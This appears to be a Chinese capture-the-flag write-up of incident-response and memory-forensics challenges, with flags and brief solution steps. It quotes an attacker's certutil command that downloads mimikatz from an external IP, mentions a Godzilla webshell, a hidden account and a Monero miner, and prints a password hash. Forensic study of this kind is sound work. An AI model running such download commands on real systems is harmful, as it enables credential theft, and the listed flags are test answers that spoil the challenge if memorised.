Yikjiang2025-01-03文章来源:SecHub网络安全社区
根据邮件的收发顺序,以下是邮服的发件顺序: 邮件发件服务器: mail.solar.sec IP地址: 127.0.0.1(本地邮件服务器) 邮件传输协议: ESMTP (通过Postfix) 发送时间: Thu, 17 Oct 2024 11:24:01 +0800 中继邮件服务器: mail.da4s8gag.com IP地址: 140.143.207.229 邮件传输协议: SMTP 发送时间: Thu, 17 Oct 2024 11:24:01 +0800 最终接收服务器: newxmmxszc6-1.qq.com (QQ邮箱服务器) 邮件传输协议: SMTP 接收时间: Thu, 17 Oct 2024 11:24:01 +0800 因此,发件顺序为: mail.solar.sec → mail.da4s8gag.com → newxmmxszc6-1.qq.com
按照题目要求的flag格式,答案为:
flag{mail.solar.sec|mail.da4s8gag.com|newxmmxszc6-1.qq.com}
1、将题目内容放到D盾,发现后门
2、发现字符串,解密后获取flag
flag{A7b4_X9zK_2v8N_wL5q4}
1、Webshell类型为哥斯拉,爆破出密钥为a2550eeab0724a69
2、对返回包进行解密发现flag
flag{sA4hP_89dFh_x09tY_lL4SI4}
1、使用volatility工具查看端口。
.\volatility.exe -f .\SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 netscan
1、volatility查看历史命令
.\volatility.exe -f .\SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 cmdscan
2、发现敏感操作,提取Hack IP
certutil -urlcache -split -f http://155.94.204.67:85/mimikatz.exe C:\Windows\Temp\mi.exe
flag{155.94.204.67}
1、根据第二题的历史命令,发现pass.txt文件
2、查看pass.txt的偏移量,获取Flag
dumpfiles -Q 0x000000007e4cedd0 -D
flag{GalaxManager_2012}
1、利用volatility插件hashdump读取密码
.\volatility.exe -f .\SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 hashdump
flag{ASP.NET}
1、MemProcFS导出日志文件,分析日志
2、发现远程登录日志,根据Flag格式修改,提交flag
flag{2024/12/21 00:15:34}
1、在内存取证4中即可看出来,将ASP.NET的用户hash值用flag{}包裹
flag{5ffe97489cbec1e08d0c6339ec39416d}
1、使用大白菜修改密码,这里修改为admin。
2、导入大白菜镜像
3、修改密码后成功进入系统,即可导入日志分析工具进行分析
1、这里可以使用多种方式查看,我这里查看了用户设置密码的时间,也就相当初创建时间
net user test$
2、获得Flag
flag{2024/12/16 15:24:21}
1、上传火绒剑查看网络连接情况,发现XMR门罗币挖矿木马病毒
2、提交Flag
flag{xmrig.exe}
1、依旧是根据火绒剑,获取外联IP
flag{203.107.45.167}
直接提交即可
flag{solar}
理论题部分结合日志分析工具及猜测作答。